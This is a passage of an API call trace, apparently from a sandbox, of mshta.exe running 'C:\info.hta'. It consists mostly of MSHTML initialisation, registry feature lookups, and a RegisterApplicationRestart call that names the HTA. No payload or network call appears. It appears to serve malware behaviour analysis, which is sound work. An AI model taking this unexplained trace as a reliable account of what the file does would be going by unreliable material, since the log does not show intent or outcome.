286331153 [0222.541] __dllonexit () returned 0x74166cb1 [0222.541] __dllonexit () returned 0x74167294 [0222.541] __dllonexit () returned 0x74166ccb [0222.549] __dllonexit () returned 0x74166cd3 [0222.549] __dllonexit () returned 0x74166ce2 [0222.549] __dllonexit () returned 0x74166cf1 [0222.549] __dllonexit () returned 0x74166d00 [0222.549] __dllonexit () returned 0x7415f72d [0222.549] __dllonexit () returned 0x74166d43 [0222.549] __dllonexit () returned 0x74166d56 [0222.549] __dllonexit () returned 0x7415f095 [0222.549] __dllonexit () returned 0x74166d65 [0222.549] __dllonexit () returned 0x74166d78 [0222.550] __dllonexit () returned 0x74166d87 [0222.550] __dllonexit () returned 0x74166d9a [0222.550] __dllonexit () returned 0x74162256 [0222.550] __dllonexit () returned 0x7416679d [0222.550] __dllonexit () returned 0x74166dd5 [0222.550] __dllonexit () returned 0x74166df8 [0222.550] __dllonexit () returned 0x74166e07 [0222.550] __dllonexit () returned 0x741676cb [0222.550] __dllonexit () returned 0x74166e1a [0222.550] __dllonexit () returned 0x741672aa [0222.550] __dllonexit () returned 0x741672cb [0222.550] __dllonexit () returned 0x74166e3a [0222.551] GetCurrentThreadId () returned 0x36c [0222.551] CoCreateGuid (in: pguid=0x7447ad20 | out: pguid=0x7447ad20*(Data1=0x2fd6db14, Data2=0xf32a, Data3=0x4f9a, Data4=([0]=0x9b, [1]=0x14, [2]=0x2e, [3]=0x76, [4]=0x4, [5]=0xab, [6]=0xa2, [7]=0xb0))) returned 0x0 [0222.552] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x200) returned 0x5ae6b8 [0222.552] __dllonexit () returned 0x7416733d [0222.552] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x1eef70, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\mshta.exe" (normalized: "c:\\windows\\syswow64\\mshta.exe")) returned 0x1d [0222.552] PathFindFileNameW (pszPath="C:\\Windows\\SysWOW64\\mshta.exe") returned="mshta.exe" [0222.552] StrCmpICW (pszStr1="mshta.exe", pszStr2="iexplore.exe") returned 4 [0222.552] StrCmpICW (pszStr1="mshta.exe", pszStr2="explorer.exe") returned 8 [0222.552] LocalAlloc (uFlags=0x40, uBytes=0x14) returned 0x5ae8c0 [0222.552] SHRegGetValueW () returned 0x2 [0222.552] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x1ef1bc | out: phkResult=0x1ef1bc*=0x0) returned 0x2 [0222.552] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x1ef1b8 | out: phkResult=0x1ef1b8*=0x0) returned 0x2 [0222.553] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x1ef1b0 | out: phkResult=0x1ef1b0*=0x94) returned 0x0 [0222.553] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x1ef1b4 | out: phkResult=0x1ef1b4*=0x98) returned 0x0 [0222.553] RegOpenKeyExW (in: hKey=0x98, lpSubKey="FEATURE_CSS_DATA_RESPECTS_XSS_ZONE_SETTING_KB912120", ulOptions=0x0, samDesired=0x1, phkResult=0x1ef170 | out: phkResult=0x1ef170*=0x0) returned 0x2 [0222.553] RegOpenKeyExW (in: hKey=0x94, lpSubKey="FEATURE_CSS_DATA_RESPECTS_XSS_ZONE_SETTING_KB912120", ulOptions=0x0, samDesired=0x1, phkResult=0x1ef170 | out: phkResult=0x1ef170*=0x0) returned 0x2 [0222.553] RegCloseKey (hKey=0x0) returned 0x6 [0222.553] RegCloseKey (hKey=0x0) returned 0x6 [0222.553] RegCloseKey (hKey=0x94) returned 0x0 [0222.553] RegCloseKey (hKey=0x98) returned 0x0 [0222.553] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x1ef1b0 | out: phkResult=0x1ef1b0*=0x98) returned 0x0 [0222.553] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x1ef1b4 | out: phkResult=0x1ef1b4*=0x94) returned 0x0 [0222.553] RegOpenKeyExW (in: hKey=0x94, lpSubKey="FEATURE_EXTERNAL_STYLE_SHEET_FIX_FOR_SMARTNAVIGATION_KB926131", ulOptions=0x0, samDesired=0x1, phkResult=0x1ef170 | out: phkResult=0x1ef170*=0x0) returned 0x2 [0222.553] RegOpenKeyExW (in: hKey=0x98, lpSubKey="FEATURE_EXTERNAL_STYLE_SHEET_FIX_FOR_SMARTNAVIGATION_KB926131", ulOptions=0x0, samDesired=0x1, phkResult=0x1ef170 | out: phkResult=0x1ef170*=0x0) returned 0x2 [0222.554] RegCloseKey (hKey=0x0) returned 0x6 [0222.554] RegCloseKey (hKey=0x0) returned 0x6 [0222.554] RegCloseKey (hKey=0x98) returned 0x0 [0222.554] RegCloseKey (hKey=0x94) returned 0x0 [0222.554] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x1ef1b0 | out: phkResult=0x1ef1b0*=0x94) returned 0x0 [0222.554] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x1ef1b4 | out: phkResult=0x1ef1b4*=0x98) returned 0x0 [0222.554] RegOpenKeyExW (in: hKey=0x98, lpSubKey="FEATURE_ARIA_SUPPORT", ulOptions=0x0, samDesired=0x1, phkResult=0x1ef170 | out: phkResult=0x1ef170*=0x0) returned 0x2 [0222.554] RegOpenKeyExW (in: hKey=0x94, lpSubKey="FEATURE_ARIA_SUPPORT", ulOptions=0x0, samDesired=0x1, phkResult=0x1ef170 | out: phkResult=0x1ef170*=0x0) returned 0x2 [0222.554] RegCloseKey (hKey=0x0) returned 0x6 [0222.554] RegCloseKey (hKey=0x0) returned 0x6 [0222.554] RegCloseKey (hKey=0x94) returned 0x0 [0222.554] RegCloseKey (hKey=0x98) returned 0x0 [0222.554] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x1ef1b0 | out: phkResult=0x1ef1b0*=0x98) returned 0x0 [0222.554] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x1ef1b4 | out: phkResult=0x1ef1b4*=0x94) returned 0x0 [0222.554] RegOpenKeyExW (in: hKey=0x94, lpSubKey="FEATURE_LEGACY_DISPPARAMS", ulOptions=0x0, samDesired=0x1, phkResult=0x1ef170 | out: phkResult=0x1ef170*=0x0) returned 0x2 [0222.554] RegOpenKeyExW (in: hKey=0x98, lpSubKey="FEATURE_LEGACY_DISPPARAMS", ulOptions=0x0, samDesired=0x1, phkResult=0x1ef170 | out: phkResult=0x1ef170*=0x9c) returned 0x0 [0222.555] SHRegGetValueW () returned 0x2 [0222.555] SHRegGetValueW () returned 0x2 [0222.555] RegCloseKey (hKey=0x9c) returned 0x0 [0222.555] RegCloseKey (hKey=0x0) returned 0x6 [0222.555] RegCloseKey (hKey=0x0) returned 0x6 [0222.555] RegCloseKey (hKey=0x98) returned 0x0 [0222.555] RegCloseKey (hKey=0x94) returned 0x0 [0222.555] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x1ef1b0 | out: phkResult=0x1ef1b0*=0x94) returned 0x0 [0222.555] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x1ef1b4 | out: phkResult=0x1ef1b4*=0x98) returned 0x0 [0222.555] RegOpenKeyExW (in: hKey=0x98, lpSubKey="FEATURE_PRIVATE_FONT_SETTING", ulOptions=0x0, samDesired=0x1, phkResult=0x1ef170 | out: phkResult=0x1ef170*=0x0) returned 0x2 [0222.555] RegOpenKeyExW (in: hKey=0x94, lpSubKey="FEATURE_PRIVATE_FONT_SETTING", ulOptions=0x0, samDesired=0x1, phkResult=0x1ef170 | out: phkResult=0x1ef170*=0x0) returned 0x2 [0222.555] RegCloseKey (hKey=0x0) returned 0x6 [0222.555] RegCloseKey (hKey=0x0) returned 0x6 [0222.555] RegCloseKey (hKey=0x94) returned 0x0 [0222.555] RegCloseKey (hKey=0x98) returned 0x0 [0222.555] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x1ef1b0 | out: phkResult=0x1ef1b0*=0x98) returned 0x0 [0222.555] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x1ef1b4 | out: phkResult=0x1ef1b4*=0x94) returned 0x0 [0222.555] RegOpenKeyExW (in: hKey=0x94, lpSubKey="FEATURE_CSS_SHOW_HIDE_EVENTS", ulOptions=0x0, samDesired=0x1, phkResult=0x1ef170 | out: phkResult=0x1ef170*=0x0) returned 0x2 [0222.556] RegOpenKeyExW (in: hKey=0x98, lpSubKey="FEATURE_CSS_SHOW_HIDE_EVENTS", ulOptions=0x0, samDesired=0x1, phkResult=0x1ef170 | out: phkResult=0x1ef170*=0x0) returned 0x2 [0222.556] RegCloseKey (hKey=0x0) returned 0x6 [0222.556] RegCloseKey (hKey=0x0) returned 0x6 [0222.556] RegCloseKey (hKey=0x98) returned 0x0 [0222.556] RegCloseKey (hKey=0x94) returned 0x0 [0222.556] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x1ef1b0 | out: phkResult=0x1ef1b0*=0x94) returned 0x0 [0222.556] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x1ef1b4 | out: phkResult=0x1ef1b4*=0x98) returned 0x0 [0222.556] RegOpenKeyExW (in: hKey=0x98, lpSubKey="FEATURE_DISPLAY_NODE_ADVISE_KB833311", ulOptions=0x0, samDesired=0x1, phkResult=0x1ef170 | out: phkResult=0x1ef170*=0x0) returned 0x2 [0222.556] RegOpenKeyExW (in: hKey=0x94, lpSubKey="FEATURE_DISPLAY_NODE_ADVISE_KB833311", ulOptions=0x0, samDesired=0x1, phkResult=0x1ef170 | out: phkResult=0x1ef170*=0x0) returned 0x2 [0222.556] RegCloseKey (hKey=0x0) returned 0x6 [0222.556] RegCloseKey (hKey=0x0) returned 0x6 [0222.556] RegCloseKey (hKey=0x94) returned 0x0 [0222.556] RegCloseKey (hKey=0x98) returned 0x0 [0222.556] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x1ef1b0 | out: phkResult=0x1ef1b0*=0x98) returned 0x0 [0222.556] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x1ef1b4 | out: phkResult=0x1ef1b4*=0x94) returned 0x0 [0222.556] RegOpenKeyExW (in: hKey=0x94, lpSubKey="FEATURE_ALLOW_EXPANDURI_BYPASS", ulOptions=0x0, samDesired=0x1, phkResult=0x1ef170 | out: phkResult=0x1ef170*=0x0) returned 0x2 [0222.556] RegOpenKeyExW (in: hKey=0x98, lpSubKey="FEATURE_ALLOW_EXPANDURI_BYPASS", ulOptions=0x0, samDesired=0x1, phkResult=0x1ef170 | out: phkResult=0x1ef170*=0x0) returned 0x2 [0222.557] RegCloseKey (hKey=0x0) returned 0x6 [0222.557] RegCloseKey (hKey=0x0) returned 0x6 [0222.557] RegCloseKey (hKey=0x98) returned 0x0 [0222.557] RegCloseKey (hKey=0x94) returned 0x0 [0222.557] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x1ef1b0 | out: phkResult=0x1ef1b0*=0x94) returned 0x0 [0222.557] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x1ef1b4 | out: phkResult=0x1ef1b4*=0x98) returned 0x0 [0222.557] RegOpenKeyExW (in: hKey=0x98, lpSubKey="FEATURE_BODY_SIZE_IN_EDITABLE_IFRAME_KB943245", ulOptions=0x0, samDesired=0x1, phkResult=0x1ef170 | out: phkResult=0x1ef170*=0x0) returned 0x2 [0222.557] RegOpenKeyExW (in: hKey=0x94, lpSubKey="FEATURE_BODY_SIZE_IN_EDITABLE_IFRAME_KB943245", ulOptions=0x0, samDesired=0x1, phkResult=0x1ef170 | out: phkResult=0x1ef170*=0x0) returned 0x2 [0222.557] RegCloseKey (hKey=0x0) returned 0x6 [0222.557] RegCloseKey (hKey=0x0) returned 0x6 [0222.557] RegCloseKey (hKey=0x94) returned 0x0 [0222.557] RegCloseKey (hKey=0x98) returned 0x0 [0222.557] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x1ef1b0 | out: phkResult=0x1ef1b0*=0x98) returned 0x0 [0222.557] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x1ef1b4 | out: phkResult=0x1ef1b4*=0x94) returned 0x0 [0222.557] RegOpenKeyExW (in: hKey=0x94, lpSubKey="FEATURE_DATABINDING_SUPPORT", ulOptions=0x0, samDesired=0x1, phkResult=0x1ef170 | out: phkResult=0x1ef170*=0x0) returned 0x2 [0222.557] RegOpenKeyExW (in: hKey=0x98, lpSubKey="FEATURE_DATABINDING_SUPPORT", ulOptions=0x0, samDesired=0x1, phkResult=0x1ef170 | out: phkResult=0x1ef170*=0x0) returned 0x2 [0222.557] RegCloseKey (hKey=0x0) returned 0x6 [0222.558] RegCloseKey (hKey=0x0) returned 0x6 [0222.558] RegCloseKey (hKey=0x98) returned 0x0 [0222.558] RegCloseKey (hKey=0x94) returned 0x0 [0222.558] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x1ef1b0 | out: phkResult=0x1ef1b0*=0x94) returned 0x0 [0222.558] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x1ef1b4 | out: phkResult=0x1ef1b4*=0x98) returned 0x0 [0222.558] RegOpenKeyExW (in: hKey=0x98, lpSubKey="FEATURE_ENFORCE_BSTR", ulOptions=0x0, samDesired=0x1, phkResult=0x1ef170 | out: phkResult=0x1ef170*=0x0) returned 0x2 [0222.558] RegOpenKeyExW (in: hKey=0x94, lpSubKey="FEATURE_ENFORCE_BSTR", ulOptions=0x0, samDesired=0x1, phkResult=0x1ef170 | out: phkResult=0x1ef170*=0x0) returned 0x2 [0222.558] RegCloseKey (hKey=0x0) returned 0x6 [0222.558] RegCloseKey (hKey=0x0) returned 0x6 [0222.558] RegCloseKey (hKey=0x94) returned 0x0 [0222.558] RegCloseKey (hKey=0x98) returned 0x0 [0222.558] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x1ef1b0 | out: phkResult=0x1ef1b0*=0x98) returned 0x0 [0222.558] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x1ef1b4 | out: phkResult=0x1ef1b4*=0x94) returned 0x0 [0222.558] RegOpenKeyExW (in: hKey=0x94, lpSubKey="FEATURE_ENABLE_DYNAMIC_OBJECT_CACHING", ulOptions=0x0, samDesired=0x1, phkResult=0x1ef170 | out: phkResult=0x1ef170*=0x0) returned 0x2 [0222.558] RegOpenKeyExW (in: hKey=0x98, lpSubKey="FEATURE_ENABLE_DYNAMIC_OBJECT_CACHING", ulOptions=0x0, samDesired=0x1, phkResult=0x1ef170 | out: phkResult=0x1ef170*=0x0) returned 0x2 [0222.558] RegCloseKey (hKey=0x0) returned 0x6 [0222.558] RegCloseKey (hKey=0x0) returned 0x6 [0222.558] RegCloseKey (hKey=0x98) returned 0x0 [0222.559] RegCloseKey (hKey=0x94) returned 0x0 [0222.559] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0222.560] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x1ef1b0 | out: phkResult=0x1ef1b0*=0x98) returned 0x0 [0222.560] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x1ef1b4 | out: phkResult=0x1ef1b4*=0x9c) returned 0x0 [0222.560] RegOpenKeyExW (in: hKey=0x9c, lpSubKey="FEATURE_LEGACY_TOSTRING_IN_COMPATVIEW", ulOptions=0x0, samDesired=0x1, phkResult=0x1ef170 | out: phkResult=0x1ef170*=0x0) returned 0x2 [0222.560] RegOpenKeyExW (in: hKey=0x98, lpSubKey="FEATURE_LEGACY_TOSTRING_IN_COMPATVIEW", ulOptions=0x0, samDesired=0x1, phkResult=0x1ef170 | out: phkResult=0x1ef170*=0x0) returned 0x2 [0222.560] RegCloseKey (hKey=0x0) returned 0x6 [0222.560] RegCloseKey (hKey=0x0) returned 0x6 [0222.560] RegCloseKey (hKey=0x98) returned 0x0 [0222.560] RegCloseKey (hKey=0x9c) returned 0x0 [0222.560] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x1ef1b0 | out: phkResult=0x1ef1b0*=0x9c) returned 0x0 [0222.560] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x1ef1b4 | out: phkResult=0x1ef1b4*=0x98) returned 0x0 [0222.560] RegOpenKeyExW (in: hKey=0x98, lpSubKey="FEATURE_ENABLE_OM_SCREEN_ORIGIN_DISPLAY_PIXELS", ulOptions=0x0, samDesired=0x1, phkResult=0x1ef170 | out: phkResult=0x1ef170*=0x0) returned 0x2 [0222.561] RegOpenKeyExW (in: hKey=0x9c, lpSubKey="FEATURE_ENABLE_OM_SCREEN_ORIGIN_DISPLAY_PIXELS", ulOptions=0x0, samDesired=0x1, phkResult=0x1ef170 | out: phkResult=0x1ef170*=0x0) returned 0x2 [0222.561] RegCloseKey (hKey=0x0) returned 0x6 [0222.561] RegCloseKey (hKey=0x0) returned 0x6 [0222.561] RegCloseKey (hKey=0x9c) returned 0x0 [0222.561] RegCloseKey (hKey=0x98) returned 0x0 [0222.561] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x1ef1b0 | out: phkResult=0x1ef1b0*=0x98) returned 0x0 [0222.561] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x1ef1b4 | out: phkResult=0x1ef1b4*=0x9c) returned 0x0 [0222.561] RegOpenKeyExW (in: hKey=0x9c, lpSubKey="FEATURE_RESTRICT_CRASH_RECOVERY_SAVE_KB978454", ulOptions=0x0, samDesired=0x1, phkResult=0x1ef170 | out: phkResult=0x1ef170*=0x0) returned 0x2 [0222.561] RegOpenKeyExW (in: hKey=0x98, lpSubKey="FEATURE_RESTRICT_CRASH_RECOVERY_SAVE_KB978454", ulOptions=0x0, samDesired=0x1, phkResult=0x1ef170 | out: phkResult=0x1ef170*=0x0) returned 0x2 [0222.561] RegCloseKey (hKey=0x0) returned 0x6 [0222.561] RegCloseKey (hKey=0x0) returned 0x6 [0222.561] RegCloseKey (hKey=0x98) returned 0x0 [0222.561] RegCloseKey (hKey=0x9c) returned 0x0 [0222.562] GetSystemMetrics (nIndex=68) returned 4 [0222.562] GetSystemMetrics (nIndex=69) returned 4 [0222.562] GetProfileIntA (lpAppName="windows", lpKeyName="DragDelay", nDefault=20) returned 0x14 [0222.562] GetSystemDefaultLCID () returned 0x409 [0222.562] GetVersionExW (in: lpVersionInformation=0x1ef114*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x76f3e36c, dwMinorVersion=0x76f3e0d2, dwBuildNumber=0x7447afd8, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1ef114*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0222.562] GetUserDefaultUILanguage () returned 0x409 [0222.562] GetLocaleInfoW (in: Locale=0x409, LCType=0x58, lpLCData=0x1ef064, cchData=16 | out: lpLCData="\x03") returned 16 [0222.563] GetKeyboardLayoutList (in: nBuff=32, lpList=0x1ef094 | out: lpList=0x1ef094) returned 1 [0222.563] GetSystemMetrics (nIndex=4096) returned 0 [0222.563] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x1ef1b8 | out: phkResult=0x1ef1b8*=0x9c) returned 0x0 [0222.563] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x1ef1bc | out: phkResult=0x1ef1bc*=0x98) returned 0x0 [0222.564] RegOpenKeyExW (in: hKey=0x98, lpSubKey="FEATURE_CLEANUP_AT_FLS", ulOptions=0x0, samDesired=0x1, phkResult=0x1ef178 | out: phkResult=0x1ef178*=0x0) returned 0x2 [0222.564] RegOpenKeyExW (in: hKey=0x9c, lpSubKey="FEATURE_CLEANUP_AT_FLS", ulOptions=0x0, samDesired=0x1, phkResult=0x1ef178 | out: phkResult=0x1ef178*=0x0) returned 0x2 [0222.564] RegCloseKey (hKey=0x0) returned 0x6 [0222.564] RegCloseKey (hKey=0x0) returned 0x6 [0222.564] RegCloseKey (hKey=0x9c) returned 0x0 [0222.564] RegCloseKey (hKey=0x98) returned 0x0 [0222.564] GetModuleFileNameW (in: hModule=0x73f40000, lpFilename=0x1ef020, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\mshtml.dll" (normalized: "c:\\windows\\syswow64\\mshtml.dll")) returned 0x1e [0222.564] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x3e) returned 0x5a3ca8 [0222.564] RegisterClipboardFormatA (lpszFormat="Embedded Object") returned 0xc00a [0222.564] RegisterClipboardFormatA (lpszFormat="Embed Source") returned 0xc00b [0222.564] RegisterClipboardFormatA (lpszFormat="Link Source") returned 0xc00d [0222.564] RegisterClipboardFormatA (lpszFormat="Link Source Descriptor") returned 0xc00f [0222.564] RegisterClipboardFormatA (lpszFormat="Object Descriptor") returned 0xc00e [0222.564] RegisterClipboardFormatA (lpszFormat="MS Forms CLSID") returned 0xc14b [0222.564] RegisterClipboardFormatA (lpszFormat="MS Forms Text") returned 0xc14c [0222.564] GetDC (hWnd=0x0) returned 0x100101fa [0222.564] SHCreateShellPalette (hdc=0x0) returned 0x140801e2 [0222.564] GetPaletteEntries (in: hpal=0x140801e2, iStart=0x0, cEntries=0x100, pPalEntries=0x7447a494 | out: pPalEntries=0x7447a494) returned 0x100 [0222.564] SHGetInverseCMAP (in: pbMap=0x74478a7c, cbMap=0x4 | out: pbMap=0x74478a7c) returned 0x0 [0222.564] GetDeviceCaps (hdc=0x100101fa, index=38) returned 32409 [0222.564] ReleaseDC (hWnd=0x0, hDC=0x100101fa) returned 1 [0222.564] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x20a) returned 0x5ae900 [0222.565] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x2000) returned 0x5af318 [0222.565] GetCurrentProcessId () returned 0x124 [0222.565] _vsnprintf (in: _DstBuf=0x1ef564, _MaxCount=0x16, _Format="%s%08lX", _ArgList=0x1ef22c | out: _DstBuf="#MSHTML#PERF#00000124") returned 21 [0222.565] OpenFileMappingA (dwDesiredAccess=0x2, bInheritHandle=0, lpName="#MSHTML#PERF#00000124") returned 0x0 [0222.565] GetVersionExW (in: lpVersionInformation=0x1ef248*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x593598, dwMinorVersion=0x100, dwBuildNumber=0x5adb00, dwPlatformId=0x590000, szCSDVersion="A") | out: lpVersionInformation=0x1ef248*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0222.565] GetModuleHandleW (lpModuleName="advapi32") returned 0x763d0000 [0222.565] GetProcAddress (hModule=0x763d0000, lpProcName="EventWrite") returned 0x76f70c59 [0222.565] GetProcAddress (hModule=0x763d0000, lpProcName="EventRegister") returned 0x76f4f6ba [0222.565] GetProcAddress (hModule=0x763d0000, lpProcName="EventUnregister") returned 0x76f69241 [0222.565] EtwEventRegister () returned 0x0 [0222.565] EtwRegisterTraceGuidsW () returned 0x0 [0222.565] EtwRegisterTraceGuidsW () returned 0x0 [0222.565] EtwEventRegister () returned 0x0 [0222.566] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Program Files\\Microsoft Office\\Office14\\outllib.dll", lpdwHandle=0x1ef014 | out: lpdwHandle=0x1ef014) returned 0x0 [0222.566] GetModuleHandleW (lpModuleName=0x0) returned 0xb40000 [0222.566] GetModuleFileNameW (in: hModule=0xb40000, lpFilename=0x1ef020, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\mshta.exe" (normalized: "c:\\windows\\syswow64\\mshta.exe")) returned 0x1d [0222.566] PathFindFileNameW (pszPath="C:\\Windows\\SysWOW64\\mshta.exe") returned="mshta.exe" [0222.568] GetCurrentProcessId () returned 0x124 [0222.568] GetCurrentProcessId () returned 0x124 [0222.569] CreateMutexW (lpMutexAttributes=0x0, bInitialOwner=0, lpName="Local\\!PrivacIE!SharedMemory!Mutex") returned 0xbc [0222.569] GetLastError () returned 0xb7 [0222.569] CreateFileMappingW (hFile=0xffffffff, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x10, lpName="Local\\!PrivacIE!SharedMem!Counter") returned 0xc0 [0222.569] MapViewOfFile (hFileMappingObject=0xc0, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xe0000 [0222.577] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x521cd8 | out: hHeap=0x520000) returned 1 [0222.577] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x521de8 | out: hHeap=0x520000) returned 1 [0222.577] RegCloseKey (hKey=0x42) returned 0x0 [0222.577] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76180000 [0222.578] GetProcAddress (hModule=0x76180000, lpProcName="RegisterApplicationRestart") returned 0x761bb53c [0222.578] lstrlenA (lpString="\"C:\\info.hta\" ") returned 14 [0222.578] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x1e) returned 0x521cd8 [0222.578] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x592a88, cbMultiByte=-1, lpWideCharStr=0x521cd8, cchWideChar=15 | out: lpWideCharStr="\"C:\\info.hta\" ") returned 15 [0222.578] RegisterApplicationRestart (pwzCommandline="\"C:\\info.hta\" ", dwFlags=0x0) returned 0x0 [0222.578] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x521cd8 | out: hHeap=0x520000) returned 1 [0222.578] GetProcAddress (hModule=0x73f40000, lpProcName="RunHTMLApplication") returned 0x73f9e710 [0222.578] GetCommandLineW () returned="\"C:\\Windows\\SysWOW64\\mshta.exe\" \"C:\\info.hta\" " [0222.578] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x22) returned 0x5acf18 [0222.578] OleInitialize (pvReserved=0x0) returned 0x0 